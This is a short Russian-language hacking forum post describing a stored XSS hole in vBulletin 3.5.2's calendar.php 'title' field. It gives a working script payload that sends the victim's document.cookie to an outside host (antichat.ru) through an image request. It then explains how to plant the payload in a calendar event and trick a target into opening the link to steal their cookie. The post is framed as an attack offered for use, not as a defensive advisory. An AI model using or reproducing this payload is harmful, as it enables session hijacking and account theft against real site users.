18.05.2007, 11:27
|
|
Новичок
Регистрация: 21.11.2006
Сообщений: 29
С нами:
10247209
Репутация:
33
|
|
Active XSS in Title vBulletin 3.5.2
Программа: vBulletin 3.5.2
http://www.securitylab.ru/vulnerability/source/243694.php
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных в параметре «title» сценарием calendar.php. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Код:
TITLE:--------->Test<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
BODY:---------->No matter
OTHER OPTIONS:->No matter
Пояснение: заходим в календарь, жмём создать новое событие, и в заголовке прописываем <script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>, смотрим ссылку на наше событие и впариваем её тому у кого хотим украсть cookie.
Последний раз редактировалось Elekt; 03.09.2008 в 02:46..
|
|
|